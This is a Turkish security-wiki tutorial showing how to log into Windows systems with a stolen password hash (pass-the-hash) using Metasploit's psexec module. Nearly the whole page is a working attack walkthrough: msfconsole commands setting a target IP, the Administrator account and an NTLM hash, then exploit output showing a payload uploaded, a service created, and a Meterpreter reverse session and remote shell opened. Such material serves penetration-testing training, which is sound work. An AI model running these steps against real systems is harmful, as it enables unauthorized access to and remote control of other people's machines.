Metasploit Kullanarak Pass The Hash (Parolasız Sistem Erişimi)

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç:

Sistemlerden elde edilen parola özetlerini kırmadan sistemlerde oturum açma.

Araç:

  • Metasploit psexec

Adımlar:

1.Adım: Metasploit çalıştırma;

root@bt:~/Desktop# msfconsole
msf >

2.Adım: Psexec isimli exploitin bulunması ve ilgili parametreler atanarak exploit edilip sisteme bağlanmak için psexec modülünü arama:

msf > search psexec
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution
exploit/windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution

3. Adım: Seçilen modülün özelliklerini görüntüleyip ilgili alanları hedef sisteme göre doldurma;

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(psexec) > set RHOST 192.168.2.5
RHOST => 192.168.2.5
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator

msf exploit(psexec) > set SMBPass c1a4b513d51bb1dcabd1b435b224041a:12aa250e5f7be65864aa4rc1ab134302
SMBPass => c1a4b513d51bb1dcabd1b435b224041a:12aa250e5f7be65864aa4rc1ab134302

4. Adım: Hedef sisteme saldırılması:

msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.2.3:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.2.5:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \TDHsJbAQ.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.2.5[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.2.5[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (IGeUeVNy - "MsTfiq")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Sending stage (752128 bytes) to RHOST 192.168.2.5
[*] Closing service handle...
[*] Deleting \TDHsJbAQ.exe...
[*] Meterpreter session 1 opened (RHOST 192.168.2.3:4444 -> RHOST 192.168.2.5:4122) at 2012-12-07 11:17:06 +0200 
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > Shell
Process 3680 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>

Windows sistemler, Windows 7 ile birlikte Administrator kullanıcısı dışında bir kullanıcının sistemde komut çalıştırmasını varsayılan olarak engellemiştir.